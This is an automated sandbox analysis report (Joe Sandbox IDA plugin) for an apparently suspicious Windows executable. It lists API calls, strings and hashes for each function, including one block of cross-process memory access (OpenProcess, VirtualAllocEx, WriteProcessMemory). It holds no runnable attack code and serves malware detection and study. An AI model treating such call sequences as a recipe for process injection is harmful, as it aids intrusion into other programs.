                                        • Opcode ID: 162ffce30e276b562befb3fdc8afd3cabf0a132e5cfa42998c3efa6a8cf561c4
                                        • Instruction ID: a79c42cfad1799e2ccc0e304cf73cd95a155d28918083ecc5f5de3c2cb6126c5
                                        • Opcode Fuzzy Hash: 162ffce30e276b562befb3fdc8afd3cabf0a132e5cfa42998c3efa6a8cf561c4
                                        • Instruction Fuzzy Hash: F1012479200605ABDB114FA4AC8DB6E3A6EEF8A3A1B250458FE4182260DA319D408B64
                                        APIs
                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C50FCA
                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C50FD6
                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C50FE5
                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C50FEC
                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C51002
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                        • String ID:
                                        • API String ID: 44706859-0
                                        • Opcode ID: 391837b5aa09138f533f071aaa7e8ad69b5272d3164c41959653874f44d6639f
                                        • Instruction ID: c2003e15ca83cdb893905221fa13ac31b39e535401622229574ddbf58344b217
                                        • Opcode Fuzzy Hash: 391837b5aa09138f533f071aaa7e8ad69b5272d3164c41959653874f44d6639f
                                        • Instruction Fuzzy Hash: 0FF03739201311ABDB214FA4AC8DF5A3BA9EF8A762F544414FE458A291CA70DC908B74
                                        APIs
                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C5102A
                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C51036
                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C51045
                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C5104C
                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C51062
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                        • String ID:
                                        • API String ID: 44706859-0
                                        • Opcode ID: 414cd176368e2d450e7330c4d972c39fe6d93ec2c9dddee31611a531dca0423d
                                        • Instruction ID: c621a502c35b2a8fb1f2bf86827d7f5e58ed5f143a1638d0fd435a3c524bf11d
                                        • Opcode Fuzzy Hash: 414cd176368e2d450e7330c4d972c39fe6d93ec2c9dddee31611a531dca0423d
                                        • Instruction Fuzzy Hash: C3F03739200311ABDB215FA4EC8DF5A3BADEF8A662F240414FE458A290CA70D9908B74
                                        APIs
                                        • CloseHandle.KERNEL32(?,?,?,?,00C6017D,?,00C632FC,?,00000001,00C32592,?), ref: 00C60324
                                        • CloseHandle.KERNEL32(?,?,?,?,00C6017D,?,00C632FC,?,00000001,00C32592,?), ref: 00C60331
                                        • CloseHandle.KERNEL32(?,?,?,?,00C6017D,?,00C632FC,?,00000001,00C32592,?), ref: 00C6033E
                                        • CloseHandle.KERNEL32(?,?,?,?,00C6017D,?,00C632FC,?,00000001,00C32592,?), ref: 00C6034B
                                        • CloseHandle.KERNEL32(?,?,?,?,00C6017D,?,00C632FC,?,00000001,00C32592,?), ref: 00C60358
                                        • CloseHandle.KERNEL32(?,?,?,?,00C6017D,?,00C632FC,?,00000001,00C32592,?), ref: 00C60365
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: c9638beb51004a665a1796fa7ee2f5ed5851ec15ef53109288efc048434ccca4
                                        • Instruction ID: babd48062b3204506914e654218a7b83bad2f6ad2930cb15ca1fcc53328f3d2f
                                        • Opcode Fuzzy Hash: c9638beb51004a665a1796fa7ee2f5ed5851ec15ef53109288efc048434ccca4
                                        • Instruction Fuzzy Hash: 38019072800B159FC7319F66D8C0817F7F5BE502163258A3ED1A662A31C371AA55DF80
                                        APIs
                                        • _free.LIBCMT ref: 00C2D752
                                          • Part of subcall function 00C229C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C2D7D1,00000000,00000000,00000000,00000000,?,00C2D7F8,00000000,00000007,00000000,?,00C2DBF5,00000000), ref: 00C229DE
                                          • Part of subcall function 00C229C8: GetLastError.KERNEL32(00000000,?,00C2D7D1,00000000,00000000,00000000,00000000,?,00C2D7F8,00000000,00000007,00000000,?,00C2DBF5,00000000,00000000), ref: 00C229F0
                                        • _free.LIBCMT ref: 00C2D764
                                        • _free.LIBCMT ref: 00C2D776
                                        • _free.LIBCMT ref: 00C2D788
                                        • _free.LIBCMT ref: 00C2D79A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: e6495e1f72fc18c222f674ea0f2c9fd812b84fbb934b412ff4ad57557b97ac5b
                                        • Instruction ID: ed6abcf8f01b7c3419613e55060379b1382e3568972a5a7554732826f76adfae
                                        • Opcode Fuzzy Hash: e6495e1f72fc18c222f674ea0f2c9fd812b84fbb934b412ff4ad57557b97ac5b
                                        • Instruction Fuzzy Hash: CDF04F32504324AB8621FB64F9C1E1A77DDBB18B10BE40C05F059D7945C734FCC08660
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 00C55C58
                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00C55C6F
                                        • MessageBeep.USER32(00000000), ref: 00C55C87
                                        • KillTimer.USER32(?,0000040A), ref: 00C55CA3
                                        • EndDialog.USER32(?,00000001), ref: 00C55CBD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                        • String ID:
                                        • API String ID: 3741023627-0
                                        • Opcode ID: 3f0dd93fc809f1183a85cc4bbb1b32d9582479b2979d8ac2ef66cf0bf5cfe5be
                                        • Instruction ID: a74791c25e261aeb27bc50b375c219ab1c178e129517f60a724e55814b16715a
                                        • Opcode Fuzzy Hash: 3f0dd93fc809f1183a85cc4bbb1b32d9582479b2979d8ac2ef66cf0bf5cfe5be
                                        • Instruction Fuzzy Hash: B1018B34500B049BEB205B10DD9EFA977B8BF04706F001569B553614E1D7F069888B58
                                        APIs
                                        • _free.LIBCMT ref: 00C222BE
                                          • Part of subcall function 00C229C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C2D7D1,00000000,00000000,00000000,00000000,?,00C2D7F8,00000000,00000007,00000000,?,00C2DBF5,00000000), ref: 00C229DE
                                          • Part of subcall function 00C229C8: GetLastError.KERNEL32(00000000,?,00C2D7D1,00000000,00000000,00000000,00000000,?,00C2D7F8,00000000,00000007,00000000,?,00C2DBF5,00000000,00000000), ref: 00C229F0
                                        • _free.LIBCMT ref: 00C222D0
                                        • _free.LIBCMT ref: 00C222E3
                                        • _free.LIBCMT ref: 00C222F4
                                        • _free.LIBCMT ref: 00C22305
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 81a8ba203af57b5e949a4f8a055164c45e3aafb16b30d2501fa00f236f4e59bb
                                        • Instruction ID: 244834ab95aebad54e0fd2da7901b64ac38185ad76c3848f8c8dd3893d1b3038
                                        • Opcode Fuzzy Hash: 81a8ba203af57b5e949a4f8a055164c45e3aafb16b30d2501fa00f236f4e59bb
                                        • Instruction Fuzzy Hash: DFF05E74800331EB8A12BF94FC41F4C3B64FB1D761B55060AF820D66B2C7360991AFE4
                                        APIs
                                        • EndPath.GDI32(?), ref: 00C095D4
                                        • StrokeAndFillPath.GDI32(?,?,00C471F7,00000000,?,?,?), ref: 00C095F0
                                        • SelectObject.GDI32(?,00000000), ref: 00C09603
                                        • DeleteObject.GDI32 ref: 00C09616
                                        • StrokePath.GDI32(?), ref: 00C09631
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                        • String ID:
                                        • API String ID: 2625713937-0
                                        • Opcode ID: 3e2f3ec7fde956bdeafff1997c61daa424ef62f8bc2ca562491901914921487b
                                        • Instruction ID: a500d1888db183eccc7ae8c898e6265d1e519d745489da788c945e3b1d00be04
                                        • Opcode Fuzzy Hash: 3e2f3ec7fde956bdeafff1997c61daa424ef62f8bc2ca562491901914921487b
                                        • Instruction Fuzzy Hash: 65F03C30005604EBDB525F66ED5CBAC3B61EB02362F088214F925550F2C7358AA1DF24
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                         • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: __freea$_free
                                        • String ID: a/p$am/pm
                                        • API String ID: 3432400110-3206640213
                                        • Opcode ID: 2fe2f2d8a4c7de847d6979726c7d544bb418ec46b8e928b448cd4732021e48a5
                                        • Instruction ID: a3dd886396c088abfc744a05db435cba34e601ac7db0fecfbcb68f5b710b3e2f
                                        • Opcode Fuzzy Hash: 2fe2f2d8a4c7de847d6979726c7d544bb418ec46b8e928b448cd4732021e48a5
                                        • Instruction Fuzzy Hash: 17D10331900266DACB24CF68E845BFEB7B2EF25310F2C0159ED219BE61D7759E81CB91
                                        APIs
                                          • Part of subcall function 00C10242: EnterCriticalSection.KERNEL32(00CC070C,00CC1884,?,?,00C0198B,00CC2518,?,?,?,00BF12F9,00000000), ref: 00C1024D
                                          • Part of subcall function 00C10242: LeaveCriticalSection.KERNEL32(00CC070C,?,00C0198B,00CC2518,?,?,?,00BF12F9,00000000), ref: 00C1028A
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                          • Part of subcall function 00C100A3: __onexit.LIBCMT ref: 00C100A9
                                        • __Init_thread_footer.LIBCMT ref: 00C77BFB
                                          • Part of subcall function 00C101F8: EnterCriticalSection.KERNEL32(00CC070C,?,?,00C08747,00CC2514), ref: 00C10202
                                          • Part of subcall function 00C101F8: LeaveCriticalSection.KERNEL32(00CC070C,?,00C08747,00CC2514), ref: 00C10235
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                        • String ID: 5$G$Variable must be of type 'Object'.
                                        • API String ID: 535116098-3733170431
                                        • Opcode ID: cdb218d1239470eeada7845b176c960bce4f2e30d1e47e110b9a74cae61dd1d6
                                        • Instruction ID: 3bce871a6f4442441f77e25a55addc8bc9aceb6a3d93739063a1f577a9f320eb
                                        • Opcode Fuzzy Hash: cdb218d1239470eeada7845b176c960bce4f2e30d1e47e110b9a74cae61dd1d6
                                        • Instruction Fuzzy Hash: 94918970A04209EFCB14EF94D881DBDB7B1FF48300F108199F81A9B292DB71AE85DB51
                                        APIs
                                          • Part of subcall function 00C5B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C521D0,?,?,00000034,00000800,?,00000034), ref: 00C5B42D
                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C52760
                                          • Part of subcall function 00C5B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C521FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00C5B3F8
                                          • Part of subcall function 00C5B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00C5B355
                                          • Part of subcall function 00C5B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C52194,00000034,?,?,00001004,00000000,00000000), ref: 00C5B365
                                          • Part of subcall function 00C5B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C52194,00000034,?,?,00001004,00000000,00000000), ref: 00C5B37B
                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C527CD
                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C5281A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                        • String ID: @
                                        • API String ID: 4150878124-2766056989
                                        • Opcode ID: e019e511e27b54cb6128016378be0ead8adf4e167d0b7deadf3103846c4f6366
                                        • Instruction ID: 79434df7af77be73111cad6b453593f4563927b174b78cb4d98e2b6f850d4fe5
                                        • Opcode Fuzzy Hash: e019e511e27b54cb6128016378be0ead8adf4e167d0b7deadf3103846c4f6366
                                        • Instruction Fuzzy Hash: 2D412B76900218AFDB10DBA4CD81BEEBBB8AF09300F004095FA55B7191DB706E89DBA4
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DSD876543456780000.exe,00000104), ref: 00C21769
                                        • _free.LIBCMT ref: 00C21834
                                        • _free.LIBCMT ref: 00C2183E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _free$FileModuleName
                                        • String ID: C:\Users\user\Desktop\DSD876543456780000.exe
                                        • API String ID: 2506810119-2387194488
                                        • Opcode ID: 69984e4ea18f635aac4f74b86d5d8d4be7cb57b4ffbf3e487bc3bdd98b8968da
                                        • Instruction ID: bfe9bb91cfcb462ccdf358b69a986d0c343f08a7e117b8a0060c6140ae47664f
                                        • Opcode Fuzzy Hash: 69984e4ea18f635aac4f74b86d5d8d4be7cb57b4ffbf3e487bc3bdd98b8968da
                                        • Instruction Fuzzy Hash: C131B275A00228FFCB21DF9AE881E9EBBFCEB95710B194166FC04D7611D6708E40DBA0
                                        APIs
                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C5C306
                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 00C5C34C
                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00CC1990,00F16468), ref: 00C5C395
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Menu$Delete$InfoItem
                                        • String ID: 0
                                        • API String ID: 135850232-4108050209
                                        • Opcode ID: 6c28651e5471e41cdf2d11b57de04b300b7555f30b97fb46816e46c0e0d41d82
                                        • Instruction ID: 5c1f4e3069b2fdbe1d5080380dbc338d23f870226d9a56cf07ac9d8d96b49424
                                        • Opcode Fuzzy Hash: 6c28651e5471e41cdf2d11b57de04b300b7555f30b97fb46816e46c0e0d41d82
                                        • Instruction Fuzzy Hash: 1541C3352043059FD720DF25D8C4B9ABBE4AF85311F00861DFDA5972E1D730E948DB6A
                                        APIs
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00C8CC08,00000000,?,?,?,?), ref: 00C844AA
                                        • GetWindowLongW.USER32 ref: 00C844C7
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C844D7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$Long
                                        • String ID: SysTreeView32
                                        • API String ID: 847901565-1698111956
                                        • Opcode ID: 2cd0eac07b928230aa4cea6198564203de15e8ca0f00b4d1dd2c8b6edeb71ae7
                                        • Instruction ID: a6eb73fdef4d1bf5c3a1be0c41976ac0d5a45956488b1c14c73ccb5a70ce7813
                                        • Opcode Fuzzy Hash: 2cd0eac07b928230aa4cea6198564203de15e8ca0f00b4d1dd2c8b6edeb71ae7
                                        • Instruction Fuzzy Hash: F131AD31210206AFDF24AE78DC85BEA7BA9EB48338F204725F975931E1D770ED509764
                                        APIs
                                          • Part of subcall function 00C7335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00C73077,?,?), ref: 00C73378
                                        • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C7307A
                                        • _wcslen.LIBCMT ref: 00C7309B
                                        • htons.WSOCK32(00000000,?,?,00000000), ref: 00C73106
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                        • String ID: 255.255.255.255
                                        • API String ID: 946324512-2422070025
                                        • Opcode ID: 7864a931734f75fb81a1c90a1b99724b256ff8e55cffdc7ae5225dd8d065e224
                                        • Instruction ID: f96c832b931ea0ab4248fbd5b624aefe77b1331fbf5fb5670365defba73c77e0
                                        • Opcode Fuzzy Hash: 7864a931734f75fb81a1c90a1b99724b256ff8e55cffdc7ae5225dd8d065e224
                                        • Instruction Fuzzy Hash: A031C4392002859FCB10CF69C585FA977E0EF54314F64C099E9298B392D731DF45D760
                                        APIs
                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00C84705
                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00C84713
                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00C8471A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageSend$DestroyWindow
                                        • String ID: msctls_updown32
                                        • API String ID: 4014797782-2298589950
                                        • Opcode ID: 142f54e9ac6e976f5d02ef76d2abe5976b5e721aa4ebad14fc813157efdedc3b
                                        • Instruction ID: a2c72ece9a80fa345b2e27f1f55d86dd9edb904dcbc4876d8f93f57205c9f5df
                                        • Opcode Fuzzy Hash: 142f54e9ac6e976f5d02ef76d2abe5976b5e721aa4ebad14fc813157efdedc3b
                                        • Instruction Fuzzy Hash: 35217FB5600209AFDB14EF68DCC1EBB37ADEF4A3A8B140059FA109B251DB30ED11DB64
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
